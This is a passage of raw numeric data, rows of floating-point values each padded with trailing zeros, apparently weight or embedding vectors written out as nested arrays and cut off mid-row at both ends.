-1.15386, 0.195759, -0.442527, 0.041454, 0.0496907, 0.968233, -0.819594, -0.515786, 0.503378, 0.53412, -1.93176, 0.546852, 0.217526, 0.0159655, 0.695426, -0.42943, 0.0447726, -0.0976005, 0.380133, 0.0274513, -0.80861, 1.04804, -0.0053091, 0.272228, 0.817947, 0.977107, 0.137715, -0.636124, -0.501804, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.20828, -0.0303847, 0.436792, 0.335091, -0.173446, 0.410784, 0.369784, -0.309007, 
-0.360549, -0.0524694, 0.0112505, -0.791586, 0.635683, -0.73322, 1.06559, 1.06831, -0.283025, 1.8709, -1.04886, 0.504083, -0.293927, 0.190397, 0.71305, 0.0126695, 0.0116692, -0.00702797, 0.224872, -0.904221, -0.625775, -0.143618, -0.147374, 1.06813, 0.556923, -0.21455, 0.135698, -2.6186, 0.118405, 0.0145899, 1.47995, 0.565217, 0.450213, -0.972123, 0.701766, -0.00156905, 0.546697, 0.484728, -0.690185, -0.592518, 0.140418, -0.636279, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.422953, 0.0222066, 0.338828, 1.27635, -0.9927, 1.86136, -0.255366, 0.235268, -0.644658, -0.228869, -0.00860178, 0.494966, 0.712184, -0.0216503, 0.173294, 0.44122, -0.412607, 1.11625, -0.842493, 0.496495, -0.657396, 0.217746, -5.25635, 0.0585211, 0.0364919, -0.0127628, -0.518883, -0.113222, 0.203969, -0.507175, 0.999772, 0.459076, -0.351577, -0.237441, -0.2159, -0.456683, 0.279574, -0.0187747, -0.0689664, -0.471874, -0.409932, 0.449981, -0.302601, -0.0475218, -0.712586, 0.110293, -1.63186, 0.151175, 0.741153, -0.130518, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.799142, 0.00816988, 0.0553741, -0.559372, 0.400247, 0.317241, 0.11991, -0.0809255, -0.41687, 0.319947, 0.0216162, 0.0765637, 0.478367, 0.118377, -0.0137534, 0.0871742, -0.222959, 0.12121, 0.516931, -0.146308, 0.491406, 0.512597, 0.0623626, 0.162539, 0.0129173, 0.0106943, 1.17349, -0.946097, -0.517743, -0.228096, -0.204102, -2.01319, 0.231522, 0.33731, 0.51374, -0.290217, 0.0242341, 0.0342037, -2.1485, 0.628177, 0.0631272, 0.707556, -0.265911, 0.00990055, 0.0868733, -0.129735, 0.3949, -0.207967, 0.0195495, 0.427805, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [2.00733, -0.012773, -0.232578, 0.159315, 0.0390867, 0.619946, 0.509541, 0.307073, 0.160823, -0.146549, 0.0248556, 0.0796208, 0.614687, 0.353465, 0.00746948, -0.593243, -0.52853, -0.200885, -0.441188, 0.0406136, -0.382636, -0.407389, 0.0213565, 0.500072, 0.0136711, 0.00512252, 0.38901, -0.171396, -0.179847, -0.260451, 0.169223, -0.00899478, 0.43993, 0.509578, 0.392761, 0.106603, -0.394178, 0.00815187, -0.188212, -0.266459, 0.498582, 0.273241, 0.395952, 0.0477267, 0.404917, 0.0280034, 0.354442, 1.04364, 0.201704, 0.0153662, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.736684, -0.0349476, -0.593136, -0.66023, -0.0605671, 0.179066, 0.0228669, -0.724873, -0.99508, 0.19662, -0.0382987, -0.535398, -1.70078, -0.317144, -0.650313, 0.694423, 0.232435, -0.399975, -0.0130644, -0.18234, -0.142796, 0.692194, -0.24351, -0.286019, 0.0267213, -0.0311121, -0.268437, -0.822044, 0.373082, -0.751817, -0.117626, -0.279496, -0.198716, 0.779035, -0.351806, 0.472195, -1.0053, 0.0489097, -0.211348, 0.765523, 0.15306, -0.0026115, -0.0146425, -0.0432454, 0.199387, -0.0137113, 0.970794, -12.3406, 0.00754137, 0.0891815, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.145289, 0.0185443, 0.392431, 0.683524, -0.167875, 0.617611, -0.261705, 0.165697, 0.122478, -0.408404, 0.0265899, 0.251481, 1.00811, -0.162485, -0.0393967, 0.548562, -0.101927, 
-0.421665, 0.0293742, 0.115174, 0.193213, 0.285337, 0.223236, 0.15347, 0.053773, -0.0383626, -0.301958, -0.174012, 0.29887, 0.15822, 0.387716, -8.84214, -0.497444, 0.134055, 0.0349669, 0.0324018, -0.312263, 0.00453832, -0.380591, 0.094851, -0.335861, -0.706575, 0.0620854, 0.025002, -0.100599, -0.445625, 0.0191583, 1.21613, 0.260189, -0.123328, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0586311, -0.0325541, 0.0212813, -0.127002, 0.24877, 0.259232, 0.206535, 0.253648, 0.0273293, -0.038966, 0.0327889, -0.0373718, 0.459418, 0.310978, 0.121522, -0.219244, -0.103901, -0.41725, 0.284548, 0.0570689, 0.050928, -0.119908, -0.123251, 0.0970952, 0.0140834, -0.00153388, -0.00955284, 1.74559, 0.0305404, 0.0925489, -0.110095, 0.440722, -0.170389, 0.115845, -0.130184, 0.222611, -0.25162, -0.0369903, 5.87174, -0.253637, 0.107282, 0.0209906, 0.310117, 0.0142127, 0.299072, 0.21315, 0.385674, 0.31147, 0.00250381, 0.490902, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.898132, 0.00309214, 0.192508, 0.855317, -0.76274, -0.108065, 0.108849, 0.731708, -0.999004, 0.291265, 0.00358668, -0.00489437, 1.02984, -0.189973, 1.10379, 0.298759, 0.364115, -0.159853, -0.390424, 0.357379, -0.771181, 0.42805, -0.0966753, 0.334153, -0.0503492, 0.0302441, -0.12224, -0.00263457, 0.415853, -0.063717, 0.161621, -0.394565, -0.458226, 0.0149316, 0.766441, -0.883442, 0.972034, 0.0116764, -0.0778877, 1.24059, -1.17544, -0.0264858, -0.26949, -0.0126421, -0.263898, -0.954828, 0.790132, -6.49859, 0.356417, -0.902285, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.203191, 0.0354445, -0.135743, 1.72597, -0.560661, 1.44559, -0.314939, -0.818213, -0.569982, -0.313603, -0.000582217, -0.0649615, 0.26685, 0.468704, 0.00154891, 0.267696, -0.39484, -0.138025, -0.613058, 0.233437, 0.245356, -0.0398625, -0.588535, -0.38503, -0.0287808, 0.0347579, 1.3458, 0.139366, 0.271717, -0.118868, 0.462311, -1.07635, 0.627303, 0.875428, 0.189252, -0.064001, 0.618753, 0.0444535, -0.893462, -0.377205, 0.499965, 0.253536, -1.07397, 0.0369999, -0.308284, 0.0194815, -0.497418, -0.794475, -0.499362, -0.0333678, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.632305, 0.0412482, -0.540681, -0.165997, 0.220873, -0.129048, 0.168887, -0.994412, 0.141814, -0.219544, -0.0124984, 0.138516, 0.162982, 0.268959, -0.557615, 0.274573, -0.993238, -0.0918738, 0.615859, -0.179101, 0.0966425, 0.219819, -0.145608, -0.544013, -0.0290327, -0.0114326, -0.213131, 0.166701, 0.0333745, 0.17205, -2.8335, 0.310848, 0.00191265, -0.448736, -0.429262, 0.0119225, 0.222933, 0.0202681, 0.176466, 0.227715, 0.40528, 0.0194034, 0.370197, -0.0536075, -0.0216867, -0.60503, -0.181651, 0.162705, -0.195963, -0.00411197, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.29554, 0.0134774, -0.0766397, 1.55444, -0.00156924, -0.690961, 0.343543, 0.783698, 0.150708, -0.265535, 0.0480418, 0.446613, -0.623718, -0.968348, -0.391631, -0.177534, 1.59797, -0.745347, 1.02228, -0.131052, 0.484417, -0.502683, -0.493821, 0.705358, 
-0.00197819, -0.0333751, 1.20488, -0.788768, 1.45751, -0.215878, 0.263781, -0.479928, -0.343349, -0.973586, 0.726654, 0.719119, 0.450342, 0.0380341, -0.412317, -0.71363, 0.350072, -0.676184, 0.705949, -0.00288373, 0.238811, -0.0433828, 0.875698, 0.35563, -0.646988, -0.269284, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.925119, 0.0347794, 0.583957, 2.62754, 1.2478, -0.235001, 0.316653, 0.72752, 0.199335, -0.216497, 0.0101935, 0.14869, -0.110396, -0.024033, 0.456126, -0.490487, 0.196107, 0.546506, -0.352632, 0.0783501, 0.672063, 0.693502, -0.00819177, 0.15191, -0.0157389, -0.0373847, -1.63118, 0.417357, 0.715541, -0.0381919, 0.554091, -1.79529, -0.107839, -0.268705, -0.0496835, 0.146279, -0.136102, 0.00729548, 1.30949, -0.874077, 0.0343603, 0.133566, -0.355562, 0.0273204, -0.00838481, -0.604518, -1.02755, 0.0375703, -0.0240937, -0.222968, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.527795, 0.0383142, -0.0262704, -0.0558835, 1.03953, -0.045299, 0.619427, 0.388013, 0.196309, 0.0995666, 0.0250881, -0.475638, 0.494389, 0.366606, -0.0601781, -0.326281, 0.320777, -0.914559, -0.237588, -0.0936699, -0.211966, -0.0690574, -0.271039, -0.210916, 0.0038806, 0.0158154, -0.372675, -0.570993, -0.304966, 0.44216, -0.0889994, 0.424015, 0.149365, -0.130786, 0.693733, 0.218213, -0.280842, 0.0195526, -3.5402, -1.05933, 0.303139, 0.203008, -0.789994, -0.0378943, 0.388755, 0.333951, -0.558641, 0.923171, 0.00373548, -0.0270135, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.609429, -0.0267744, -0.580239, 0.709073, 1.54059, 1.27831, 1.19364, -0.085278, -0.214036, 0.135961, 0.018017, -0.929485, 0.245321, 0.350963, -0.52767, 0.312389, -0.69484, -0.888829, 0.989515, 0.0686288, 0.511784, 0.777572, 0.483711, 0.593932, -0.0176397, -0.00807724, 0.478705, -0.272688, 0.931793, -1.08836, -0.228822, 0.179002, -0.208995, -0.0970445, -0.22213, -0.350161, 0.335524, -0.0359516, -1.12456, 0.034913, -0.0466457, 0.510957, 0.0574043, -0.0493969, 0.462243, -0.568002, 0.145591, -0.448148, -0.390142, -0.43503, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0281987, 0.000566582, -0.03319, 0.0221532, -0.00849354, -0.0180649, -0.0565698, -0.0119536, 0.0327668, 0.0118744, -0.0385735, -0.0314957, -0.0186819, -0.0245256, -0.0309155, -0.0117556, -0.00760115, 0.00568355, -0.0477713, -0.0185308, -0.0168257, -0.0325391, -0.0412281, 0.0357343, 0.00292336, -0.0178145, 0.0438456, 0.0184717, -0.0219421, -0.0254984, -0.0324205, -0.0493456, 0.00990545, -0.0401097, -0.0324605, -0.0212912, -0.0194038, -0.0400194, 0.0053588, -0.0263758, -0.0080125, -0.021069, 0.009917, 0.0446544, 0.0345754, -0.0117978, 0.0309422, -0.0197059, -0.02869, 0.0284456, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.498226, -0.00212754, -0.300608, -1.30814, -1.94194, 0.254332, -0.145014, -0.769556, -0.0293914, 0.205862, -0.0193495, 0.912017, 0.395964, -0.10937, -0.165953, 0.219708, -0.99907, 1.00183, 0.153223, 0.710201, -0.356056, 0.472834, -0.150369, 0.90725, -0.0108754, -0.0156438, 
-0.644223, 0.0745345, 1.92381, 0.498027, -0.0260848, -0.832925, 0.139549, -0.929577, -0.709852, -0.900559, 0.320868, -0.00162844, -0.109856, 0.465536, -0.423107, 0.531479, 0.383489, 0.0733732, 0.327893, -0.49893, 0.239318, -0.881306, 0.159369, -0.360308, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.265352, -0.0307186, 0.0462529, -0.181781, 0.733043, -0.193816, 0.281904, -0.699689, 0.186055, -0.0936909, 0.0238121, -0.0934531, 0.264831, -0.177657, 0.0420084, 0.374126, -0.172945, 0.0928257, 0.439511, -0.0465424, -0.880043, -0.476758, -0.0776608, 0.166694, -0.0312025, -0.0423739, -0.413975, -0.0678724, 0.130769, -0.748384, 0.287819, -1.11993, 0.331507, -0.269191, -0.00712341, 0.262485, -0.208505, 0.0427367, -0.931398, 0.579382, -0.301603, -0.15717, 0.365364, -0.0236449, 0.133663, 0.401716, -0.075845, -0.0966528, 0.155062, -0.264658, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-2.52108, 0.0290909, -2.017, -3.73543, -4.04761, -0.562509, -0.199905, 1.40298, -0.251244, 0.655591, -0.00431569, -0.704431, 0.846059, -0.793253, 1.19701, -1.70021, 0.626717, -0.717111, 0.141032, 0.558686, 0.298765, -0.790634, -0.592991, -1.09094, 0.0377733, 0.0284864, -0.143141, 0.482417, 0.585517, 1.09315, -0.469709, -5.97111, -0.172166, -0.57761, 0.611873, 1.2243, 0.0391898, -0.0215232, -0.336316, -1.70098, 1.57578, 1.69731, -1.11178, -0.0397061, 0.556967, -0.536328, 0.0221273, 1.6325, -0.656437, 1.03972, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0395581, -0.0326162, -0.00405857, -1.02651, -0.107761, 0.138699, -0.00946598, -2.804, -0.204017, -0.775859, 0.00947907, -0.327877, 0.678573, 0.57637, -0.558828, -0.426074, -1.6205, 0.791128, -0.134279, -0.91614, 0.801432, -0.860391, 0.0842009, -0.324098, 0.034872, -0.00224831, -0.624006, -0.908793, -0.363467, -0.369129, 0.674471, -2.98808, -0.214513, 0.151582, -0.537565, -0.899473, 0.503065, -0.0347963, 0.442589, -1.17465, 1.04381, 0.0212021, 0.774294, 0.0275866, 0.630269, -0.435067, 0.272839, 1.03739, -0.677481, -0.570449, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.750542, -0.0218864, 0.0847197, -0.704043, -0.00485713, 0.305485, -0.0585694, -0.490719, 0.474623, 0.0964657, 0.0115016, 0.24122, -0.382614, 0.22311, -0.231176, 0.68719, 0.329334, -0.0391206, -0.347505, 0.340976, -0.267964, -0.533978, 0.173983, -0.322495, -0.0485967, 0.0271819, -0.511946, -0.152064, 0.0743975, -0.0727767, -0.0481172, -0.970282, 0.0936253, -0.068121, -0.276842, 0.0881781, -0.19079, -0.00594462, 0.678953, 1.27712, -0.206637, 0.241272, -0.0020342, 0.0153705, 0.319087, -0.388181, -0.245889, 0.1568, 0.140698, -0.409218, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.797069, -0.0194802, 0.316095, 0.285329, -0.117365, -0.0632377, -0.232592, -0.475468, -0.170941, -0.310699, -0.0232985, 0.160642, 0.0627335, 0.214435, 0.418008, 0.232314, 0.197494, 0.645641, 0.05465, 0.229725, -0.305095, -0.00450711, 0.0072977, 0.728562, -0.0140871, 0.0311146, -0.521048, 0.378378, 0.369133, 0.0929027, 0.221504, 0.57158, 0.302709, 
0.176794, 0.454705, -0.525633, 0.087392, 0.0229355, 1.72701, -0.258743, -0.649615, -0.47496, 0.20695, 0.0477512, 0.370692, 0.0448857, 0.115091, 1.01085, 0.167652, 0.267723, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.75265, -0.0376294, 0.669118, 0.652661, 0.592636, -0.560977, 0.130308, 0.0851664, 0.163121, -0.224185, -0.0182982, 0.131956, 0.281181, 0.15409, 0.660591, 0.646505, 0.421292, -0.28295, -0.124709, 0.191452, -0.643629, -0.741481, -0.114439, 0.125842, 0.0262423, -0.0312195, -0.537618, 0.143949, -0.257022, 0.658437, 0.565879, 0.666786, -0.0388398, 0.161569, -0.451911, -0.0419057, -0.2234, -0.0445499, 0.428439, 0.448001, -0.102652, -1.02271, -0.248774, 0.0379576, 0.24753, -0.0889271, -0.474276, -0.144519, 0.495624, -0.0968043, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0951803, -0.00187257, -0.765131, 0.177984, -0.00284895, -0.258364, 0.420046, 0.530761, -0.29008, -0.30458, -0.0321534, -0.269594, 0.245471, 0.141296, -1.3413, -0.647862, -1.14806, -0.221185, -0.422511, -0.0581615, -0.093452, 0.529483, -0.0785954, 0.367973, -0.0237267, -0.0344987, 0.381297, -0.109712, 0.75184, -1.32968, -0.0576448, -1.10399, 0.129584, 0.0876565, 0.270392, -0.602751, 0.360743, -0.0202855, -0.00157789, -0.77742, -0.107373, 0.375024, -0.669179, -0.0412196, -0.0495119, 0.0244512, 0.172365, 0.785415, -0.141102, -0.35196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 
[-1.25352, 0.0242106, -0.201039, 0.120524, -0.617982, -0.597499, 0.545033, 0.264499, -0.15841, 0.22035, 0.0107195, -0.874233, -0.123166, -0.88207, 0.178922, -0.280296, -0.286, -0.296518, -1.25048, -0.216888, -0.0809658, -0.345123, 0.0340223, -0.317927, 0.0286623, 0.0476056, -0.251601, 0.381293, -0.317358, 0.226015, -0.137131, 0.0653059, -0.0646779, 0.441959, -0.838587, 0.0562255, 0.352452, -0.00729792, 6.06619, 0.0546006, 0.0240395, -0.175076, -0.552587, -0.0185979, 0.188826, 0.15121, 0.387068, 0.108374, -0.145425, 1.02106, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.46427, -0.0209486, -0.161542, 0.764034, -0.484822, -0.331698, 0.136631, -0.602292, 0.331718, 0.572579, -0.0233067, 0.572474, 0.98787, 1.07068, 0.179763, -0.471947, -0.669245, 0.22663, -0.00502685, -0.405876, 0.776654, 0.376396, 0.343438, 0.208682, 0.0233998, 0.000673103, 0.604754, 0.0778545, -0.284744, 0.282232, -0.324121, 0.306166, -0.319713, -0.354589, -0.905442, 0.145754, 0.328999, 0.0185485, 1.04418, -0.290714, -0.0861877, -0.101418, 0.477102, -0.0292807, -0.319395, 0.537465, -0.0509263, -0.449279, -0.429729, -0.47105, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.107584, -0.014962, -0.0359278, -0.372482, 0.702955, 0.762629, 0.35801, 0.0503258, -0.382309, -0.260286, -0.0263229, 0.281257, 0.12175, 0.0935972, -0.197187, 0.125212, 0.400383, -0.395041, 0.565861, 0.036061, -0.177937, 0.137943, -0.193347, 0.060231, 0.00832568, 0.0319692, -0.0170368, -0.277048, 0.409735, -0.062762, 0.0261019, -0.0868398, -0.104258, 0.113326, 0.118536, -0.415733, -0.128723, -0.00505919, 4.17283, -0.325291, 
